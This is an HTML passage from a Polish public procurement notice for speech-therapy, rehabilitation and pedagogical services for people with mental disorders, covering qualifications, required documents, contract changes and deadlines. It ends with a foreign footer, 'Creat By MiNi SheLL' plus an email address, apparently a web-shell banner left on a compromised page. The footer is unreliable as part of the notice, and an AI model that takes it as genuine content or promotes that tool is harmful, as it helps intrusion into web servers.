życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/><br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie<br/><br/>2)	uprawnień do prowadzania określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów, <br/><br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie<br/><br/>3)	sytuacji finansowej lub ekonomicznej, <br/><br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie<br/><br/>4)	zdolności technicznej lub zawodowej: <br/><br/> Zamawiający uzna, że Wykonawca spełni warunek dotyczący zdolności technicznej lub zawodowej, jeżeli: <br/><br/>	wykaże, że posiada następujące doświadczenie: <br/><br/>- w przypadku zadania I: <br/>Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał w sposób należyty usługi (usługę) które odpowiadają rodzajem usługom stanowiącym przedmiot zadania, dla przynajmniej 1 osoby, które obejmowały łącznie przynajmniej 250 godzin usług logopedycznych oraz 250 godzin usług rehabilitacyjnych (przy czym nie jest wymagane aby usługi te były świadczone równocześnie w stosunku do jednej osoby objętej usługami), <br/><br/>W przypadku świadczeń okresowych lub ciągłych Zamawiający dopuszcza nie tylko zamówienia wykonane (tj. zakończone), ale również wykonywane. W takim przypadku część zamówienia już faktycznie wykonana musi spełniać wymogi określone w Specyfikacji Warunków Zamówienia, tj. usługi muszą być zrealizowane dla przynajmniej 1 osoby i muszą obejmować zrealizowanie łącznie przynajmniej 250 godzin usług logopedycznych oraz 250 godzin usług rehabilitacyjnych (przy czym nie jest wymagane aby usługi te były świadczone równocześnie w stosunku do jednej osoby objętej usługami), <br/> <br/>- w przypadku zadania II: <br/>Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał w sposób należyty usługi (usługę) które odpowiadają rodzajem usługom stanowiącym przedmiot zadania, dla przynajmniej 1 osoby, które obejmowały łącznie przynajmniej 250 godzin usług logopedycznych oraz 400 godzin usług rehabilitacyjnych (przy czym nie jest wymagane aby usługi te były świadczone równocześnie w stosunku do jednej osoby objętej usługami), <br/> <br/>W przypadku świadczeń okresowych lub ciągłych Zamawiający dopuszcza nie tylko zamówienia wykonane (tj. zakończone), ale również wykonywane. W takim przypadku część zamówienia już faktycznie wykonana musi spełniać wymogi określone w Specyfikacji Warunków Zamówienia, tj. usługi muszą być zrealizowane dla przynajmniej 1 osoby i muszą obejmować zrealizowanie łącznie przynajmniej 250 godzin usług logopedycznych oraz 400 godzin usług rehabilitacyjnych (przy czym nie jest wymagane aby usługi te były świadczone równocześnie w stosunku do jednej osoby objętej usługami), <br/> <br/>- w przypadku zadania III: <br/>Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał w sposób należyty usługi (usługę) które odpowiadają rodzajem usługom stanowiącym przedmiot zadania, dla przynajmniej 1 osoby, które obejmowały łącznie przynajmniej 500 godzin usług logopedycznych oraz 120 godzin usług (zajęć) pedagogicznych (przy czym nie jest wymagane aby usługi te były świadczone równocześnie w stosunku do jednej osoby objętej usługami), <br/> <br/>W przypadku świadczeń okresowych lub ciągłych Zamawiający dopuszcza nie tylko zamówienia wykonane (tj. zakończone), ale również wykonywane. W takim przypadku część zamówienia już faktycznie wykonana musi spełniać wymogi określone w Specyfikacji Warunków Zamówienia, tj. usługi muszą być zrealizowane dla przynajmniej 1 osoby i muszą obejmować zrealizowanie łącznie przynajmniej 500 godzin usług logopedycznych oraz 120 godzin usług (zajęć) pedagogicznych (przy czym nie jest wymagane aby usługi te były świadczone równocześnie w stosunku do jednej osoby objętej usługami), <br/><br/>	wykaże, że: <br/>dysponuje lub będzie dysponował na czas realizacji zamówienia osobami zdolnymi wykonać zamówienie (skierowanymi przez Wykonawcę do realizacji przedmiotowych usług): <br/><br/>•	osobami posiadającymi kwalifikacje do świadczenia specjalistycznych usług dla osób z zaburzeniami psychicznymi, określone w rozporządzeniu Ministra Polityki Społecznej z dnia 22 września 2005 r. <br/>w sprawie specjalistycznych usług opiekuńczych –tj. powinien dysponować: <br/>a)	w przypadku zadania (części) nr 1 – osobami (lub osobą), które posiadają kwalifikacje do wykonywania zawodu: logopedy oraz fizjoterapeuty (tj. jedną osobą posiadającą kwalifikacje do wykonywania zawodu logopedy i jedną osobą posiadającą kwalifikacje do wykonywania zawodu fizjoterapeuty lub jedną osobą, która posiada zarówno kwalifikacje do wykonywania zawodu logopedy i fizjoterapeuty), <br/><br/>b)	w przypadku zadania (części) nr 2 - osobami (lub osobą), które posiadają kwalifikacje do wykonywania zawodu: logopedy oraz fizjoterapeuty (tj. jedną osobą posiadającą kwalifikacje do wykonywania zawodu logopedy i jedną osobą posiadającą kwalifikacje do wykonywania zawodu fizjoterapeuty lub jedną osobą, która posiada zarówno kwalifikacje do wykonywania zawodu logopedy i fizjoterapeuty), <br/><br/>c)	w przypadku zadania (części) nr 3 – osobami (lub osobą), które posiadają kwalifikacje do wykonywania zawodu: logopedy oraz pedagoga (tj. jedną osobą posiadającą kwalifikacje do wykonywania zawodu logopedy i jedną osobą posiadającą kwalifikacje do wykonywania zawodu pedagoga lub jedną osobą, która posiada zarówno kwalifikacje do wykonywania zawodu logopedy i pedagoga).<br/><br/> Dodatkowo zgodnie z rozporządzeniem Ministra Polityki Społecznej z dnia 22 września 2005 r. w sprawie specjalistycznych usług opiekuńczych: <br/>	osoby świadczące specjalistyczne usługi dla osób z zaburzeniami psychicznymi (wskazane przez Wykonawcę), muszą posiadać co najmniej półroczny staż pracy w jednej z następujących jednostek: <br/>-	szpitalu psychiatrycznym, <br/>-	jednostce organizacyjnej pomocy społecznej dla osób z zaburzeniami psychicznymi, <br/>-	placówce terapii lub placówce oświatowej, do której uczęszczają dzieci z zaburzeniami rozwoju lub upośledzeniem umysłowym, <br/>-	ośrodku terapeutyczno - edukacyjno - wychowawczym, <br/>-	zakładzie rehabilitacji,<br/>-	innej jednostce niż wymienione wyżej, świadczącej specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi, <br/>	osoby świadczące specjalistyczne usługi dla osób z zaburzeniami psychicznymi (wskazane przez Wykonawcę) muszą posiadać udokumentowane przeszkolenie i doświadczenie w zakresie:<br/>- umiejętności kształtowania motywacji do akceptowanych przez otoczenie zachowań,<br/>- kształtowania nawyków celowej aktywności,<br/>- prowadzenia treningu zachowań społecznych. <br/><br/> Żadna z osób świadczących usługi nie może figurować w Rejestrze Sprawców Przestępstw na Tle Seksualnym, o którym mowa w ustawie z dnia 13 maja 2016 r. o przeciwdziałaniu zagrożeniom przestępczością na tle seksualnym (Dz. U. z 2020 r. poz. 152 z późn. zm.) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	Wraz z ofertą Wykonawca składa następujące oświadczenia: <br/>1) oświadczenie, o którym mowa w art. 125 ust. 1 Prawa zamówień publicznych o niepodleganiu wykluczeniu oraz spełnieniu warunków udziału w postępowaniu, w zakresie wskazanym w Rozdziale III ust. 2 Specyfikacji Warunków Zamówienia, według wzoru stanowiącego załącznik nr 2 do Specyfikacji Warunków Zamówienia, <br/>2)	Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby na zasadach określonych w Rozdziale III ust. 3 Specyfikacji Warunków Zamówienia, przedstawia z oświadczeniem, o którym mowa w pkt 1, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz spełniania warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby - zgodnie z załącznikiem nr 3 do Specyfikacji Warunków Zamówienia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2.	Na odrębne wezwanie Zamawiającego Wykonawca jest zobowiązany do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień złożenia - tj.: <br/>1)	wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - według wzoru stanowiącego załącznik nr 5 do Specyfikacji Warunków Zamówienia, <br/><br/>2)	wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane (wzór wykazu usług stanowi załącznik nr 6 do Specyfikacji Warunków Zamówienia), oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, <br/><br/>Dowodami potwierdzającymi czy usługi zostały wykonane lub są wykonywane należycie, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty należy dołączyć: <br/>1)	oświadczenie o którym mowa w art. 125 ust. 1 Prawa zamówień publicznych, o niepodleganiu wykluczeniu z postępowania oraz spełnianiu warunków udziału w postępowaniu, w zakresie wskazanym w rozdziale IV Specyfikacji Warunków Zamówienia - zgodnie z załącznikiem nr 2 do Specyfikacji Warunków Zamówienia, <br/>Uwaga: <br/>a)	w przypadku Wykonawców wspólnie ubiegających się o zamówienie oświadczenie składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia Wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu, <br/>b)	w przypadku gdy Wykonawca polega na zasobach innych podmiotów na zasadach określonych w Rozdziale III ust. 3 Specyfikacji Warunków Zamówienia - Wykonawca przedstawia oświadczenie podmiotu udostępniającego zasoby (w takim przypadku oświadczenie potwierdza brak podstaw do wykluczenia podmiotu oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim podmiot udostępnia swoje zasoby Wykonawcy) - według wzoru stanowiącego załącznik nr 3 do Specyfikacji Warunków Zamówienia, <br/>2)	zobowiązanie podmiotu udostępniającego zasoby do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy, potwierdzający, że Wykonawca realizując zamówienie będzie dysponował niezbędnymi zasobami tych podmiotów (jeżeli dotyczy). Wzór zobowiązania stanowi załącznik nr 4 do Specyfikacji Warunków Zamówienia, <br/>3)	oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy (w przypadku Wykonawców wspólnie ubiegających się o zamówienie) – według wzoru stanowiącego załącznik nr 7 do Specyfikacji Warunków Zamówienia), <br/>4)	pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy: <br/>a)	jeżeli oferta została podpisana przez pełnomocnika (o ile nie wynika to z innych dokumentów dołączonych do oferty), <br/>b)	w przypadku składania oferty wspólnej, <br/>6)	pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania podmiotu udostępniającego zasoby - w przypadkach określonych w Rozdziale III ust. 3 i Rozdziale IV ust. 1 pkt 2 Specyfikacji Warunków Zamówienia (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>3.	Pełnomocnictwo, o którym mowa w ust. 2 należy dołączyć do oferty. Forma złożenia pełnomocnictwa została określona w Rozdziale IX ust. 4 Specyfikacji Warunków Zamówienia. <br/>4.	Wykonawcy składający ofertę wspólną ponoszą solidarną odpowiedzialność. <br/>5.	Oświadczenia, o których mowa w Rozdziale IV ust. 1 pkt 1 Specyfikacji Warunków Zamówienia składa każdy Wykonawca, warunek musi zostać spełniony przez każdego Wykonawcę indywidualnie. <br/>6.	Dokumenty, o których mowa w Rozdziale IV ust. 2 Specyfikacji Warunków Zamówienia składa przynajmniej jeden Wykonawca lub osobne dokumenty składa kilku Wykonawców. Warunek posiadania zdolności technicznej lub zawodowej - będzie spełniony gdy jego spełnianie potwierdzi indywidualnie przynajmniej jeden Wykonawca lub gdy kilku Wykonawców jego spełnienie potwierdzi łącznie.<br/>7.	W odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonują usługi, do realizacji których te zdolności są wymagane.<br/>8.	W przypadku, o którym mowa w ust. 7 Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są do dołączenia do oferty oświadczenia, z którego wynika, jaki zakres przedmiotu zamówienia wykonują poszczególni Wykonawcy (zgodnie z art. 117 ust. 4 Prawa zamówień publicznych) - wzór oświadczenia stanowi załącznik nr 7 do Specyfikacji Warunków Zamówienia. <br/>9.	Wspólnicy spółki cywilnej są Wykonawcami wspólnie ubiegającymi się o udzielenie zamówienia i mają do nich zastosowanie zasady określone w ust. 2-3, chyba, że pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki, bądź wszyscy wspólnicy podpiszą ofertę.<br/>10.	Przed zawarciem umowy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą mieli obowiązek przedstawić Zamawiającemu kopię umowy regulującej współpracę tych Wykonawców, zawierającą co najmniej: <br/>1)	zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem realizację przedmiotu zamówienia, <br/>2)	zakres działania poszczególnych stron umowy, <br/>3)	czas obowiązywania umowy, który nie może być krótszy niż okres obejmujący realizację zamówienia.<br/>11.	Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako pełnomocnik Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Określone w projektowanych postanowieniach umowy (załącznik nr 8 do SWZ): <br/><br/>§ 7. <br/>1.	Zmiany postanowień umowy są dopuszczalne - poza innymi przypadkami określonymi w przepisach Prawa zamówień publicznych, w sytuacji wystąpienia okoliczności, o których mowa w ust. 2. <br/>2.	Zamawiający, zgodnie z art. 455 ust. 1 pkt 1 Prawa zamówień publicznych, przewiduje możliwość dokonania zmiany umowy: <br/>1)	gdy zostały spełnione następujące warunki: <br/>a) nastąpiła konieczność zmiany umowy spowodowana: <br/> - zwiększeniem liczby świadczeniobiorców,<br/> - zwiększeniem liczby godzin świadczenia usług,<br/> b) wartość zmiany nie przekracza 50% wartości zamówienia określonej pierwotnie w umowie, <br/>2)	w przypadku wystąpienia konieczności skrócenia terminu realizacji przedmiotu zamówienia, <br/>3)	jeżeli konieczność wprowadzenia zmian spowodowana jest zmianą powszechnie obowiązujących przepisów prawa, ze skutkami z nich wynikającymi,<br/>4)	w zakresie zmiany wynagrodzenia - w przypadku wprowadzenia lub ustawowej zmiany stawki podatku VAT (zwiększenie lub zmniejszenie). Przewiduje się możliwość zmiany umowy w zakresie zwiększenia lub zmniejszenia wynagrodzenia o różnicę między obowiązującą w dniu podpisania umowy stawką podatku VAT a ustawowo wprowadzoną stawką podatku VAT, z dniem jej wprowadzenia w życie, <br/>5)	w przypadku zaistnienia siły wyższej mającej wpływ na realizację umowy (tj. klęski żywiołowej, strajku generalnego lub lokalnego mających bezpośredni wpływ na realizację umowy), <br/>6)	w przypadku zmiany statusu podatkowego po stronie Zamawiającego w związku z podatkiem VAT. <br/>3.	Stosownie do postanowień art. 439 ust. 1 Prawa zamówień publicznych, Zamawiający przewiduje możliwość zmiany wysokości wynagrodzenia w przypadku zmiany ceny materiałów lub kosztów związanych z realizacją przedmiotu zamówienia, o którym mowa w § 1 niniejszej umowy, na następujących zasadach:<br/>1)	poziom zmiany ceny materiałów lub kosztów, o których mowa w art. 439 ust. 1 Prawa zamówień publicznych uprawniający strony umowy do żądania zmiany wynagrodzenia wynosi minimum 15% względem ceny lub kosztu przyjętych w celu ustalenia wynagrodzenia Wykonawcy zawartego w ofercie,<br/>2)	początkowy termin ustalenia zmiany wynagrodzenia przypada na dzień otwarcia ofert,<br/>3)	zmiana wynagrodzenia dokonana zostanie z użyciem odesłania do wskaźnika zmiany cen materiałów lub kosztów ogłaszanego w komunikacie Prezesa Głównego Urzędu Statystycznego;<br/>4)	wysokość wynagrodzenia zmienia się o kwotę zmiany cen netto materiałów lub kosztów związanych z realizacją przedmiotu zamówienia, <br/>5)	Strona wnioskująca o zmianę umowy w zakresie przedłoży drugiej Stronie pisemny wniosek <br/>o zmianę umowy wraz uzasadnieniem konieczności wprowadzenia takiej zmiany umowy. Wniosek o zmianę wysokości wynagrodzenia należnego z tytułu realizacji przedmiotu zamówienia nie może być złożony wcześniej niż po 180 dniach od dnia otwarcia ofert, a każdy kolejny nie może być złożony wcześniej niż po 180 dniach od daty ostatniej zmiany wysokości wynagrodzenia maksymalna wartość zmiany wynagrodzenia, jaką dopuszcza Zamawiający w efekcie zastosowania postanowień o zasadach wprowadzania zmian wysokości wynagrodzenia 15% względem ceny lub kosztu przyjętych w celu ustalenia wynagrodzenia Wykonawcy zawartego w ofercie.<br/>4.	Pod pojęciem siły wyższej należy rozumieć każde zdarzenie o charakterze zewnętrznym, które w chwili zawarcia umowy nie było możliwe do przewidzenia przez Strony i skutkom którego nie można było zapobiec, w szczególności: klęski żywiołowe, stan wyjątkowy, stan wojenny, nowe akty prawne lub decyzje administracyjne mające wpływ na realizację przedmiotu umowy i/lub inne zdarzenia o podobnym charakterze, których wystąpienie wyklucza realizację niniejszej umowy. <br/>5.	Wszelkie zmiany umowy możliwe są za obopólnym pisemnym porozumieniem stron w formie aneksu do umowy pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-01-24 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem zakładki „Oferty/wnioski”, widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy. Szczegółowe informacje zawarte zostały w Specyfikacji Warunków Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-01-24 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com